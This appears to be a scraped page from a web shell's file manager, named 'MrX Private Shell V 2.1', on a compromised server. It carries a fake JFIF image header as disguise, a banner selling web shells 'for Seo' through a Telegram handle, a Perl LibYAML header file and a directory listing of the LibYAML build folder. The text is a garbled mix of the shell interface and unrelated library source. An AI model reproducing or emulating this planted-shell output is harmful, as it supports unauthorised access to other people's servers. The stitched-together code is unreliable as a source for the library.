����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#ifndef PATCHLEVEL
#include <patchlevel.h> /* Perl's one, needed since 5.6 */
#endif
#if (PATCHLEVEL <= 6)
#if defined(USE_ITHREADS)
#define STORE_HASH_SORT \
ENTER; { \
PerlInterpreter *orig_perl = PERL_GET_CONTEXT; \
SAVESPTR(orig_perl); \
PERL_SET_CONTEXT(aTHX); \
qsort((char *) AvARRAY(av), len, sizeof(SV *), sortcmp); \
} LEAVE;
#else /* ! USE_ITHREADS */
#define STORE_HASH_SORT \
qsort((char *) AvARRAY(av), len, sizeof(SV *), sortcmp);
#endif /* USE_ITHREADS */
#else /* PATCHLEVEL > 6 */
#define STORE_HASH_SORT \
sortsv(AvARRAY(av), len, Perl_sv_cmp);
#endif /* PATCHLEVEL <= 6 */
#if (PATCHLEVEL <= 6)
/*
* sortcmp
*
* Sort two SVs
* Borrowed from perl source file pp_ctl.c, where it is used by pp_sort.
*/
static int
sortcmp(const void *a, const void *b)
{
#if defined(USE_ITHREADS)
dTHX;
#endif /* USE_ITHREADS */
return sv_cmp(*(SV * const *) a, *(SV * const *) b);
}
#endif /* PATCHLEVEL <= 6 */
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| lib | Folder | 0755 |
|
|
| LibYAML.bs | File | 0 B | 0644 |
|
| LibYAML.c | File | 14.71 KB | 0644 |
|
| LibYAML.o | File | 305.26 KB | 0644 |
|
| LibYAML.xs | File | 6.84 KB | 0644 |
|
| License | File | 1.13 KB | 0644 |
|
| MYMETA.json | File | 889 B | 0644 |
|
| MYMETA.yml | File | 543 B | 0644 |
|
| Makefile | File | 29.59 KB | 0644 |
|
| Makefile.PL | File | 812 B | 0644 |
|
| api.c | File | 35.75 KB | 0644 |
|
| api.o | File | 307.51 KB | 0644 |
|
| config.h | File | 2.23 KB | 0644 |
|
| dumper.c | File | 9.83 KB | 0644 |
|
| dumper.o | File | 95.38 KB | 0644 |
|
| emitter.c | File | 64.82 KB | 0644 |
|
| emitter.o | File | 286.77 KB | 0644 |
|
| loader.c | File | 13.76 KB | 0644 |
|
| loader.o | File | 110.03 KB | 0644 |
|
| parser.c | File | 43.98 KB | 0644 |
|
| parser.o | File | 196.98 KB | 0644 |
|
| perl_libyaml.c | File | 60.95 KB | 0644 |
|
| perl_libyaml.h | File | 3.63 KB | 0644 |
|
| perl_libyaml.o | File | 601.5 KB | 0644 |
|
| pm_to_blib | File | 0 B | 0644 |
|
| ppport.h | File | 170.76 KB | 0644 |
|
| ppport_sort.h | File | 1012 B | 0644 |
|
| reader.c | File | 16.29 KB | 0644 |
|
| reader.o | File | 74.75 KB | 0644 |
|
| scanner.c | File | 96.61 KB | 0644 |
|
| scanner.o | File | 384.85 KB | 0644 |
|
| test.pl | File | 97 B | 0644 |
|
| update.sh | File | 673 B | 0755 |
|
| writer.c | File | 3.95 KB | 0644 |
|
| writer.o | File | 50.91 KB | 0644 |
|
| yaml.h | File | 53.16 KB | 0644 |
|
| yaml_private.h | File | 29.79 KB | 0644 |
|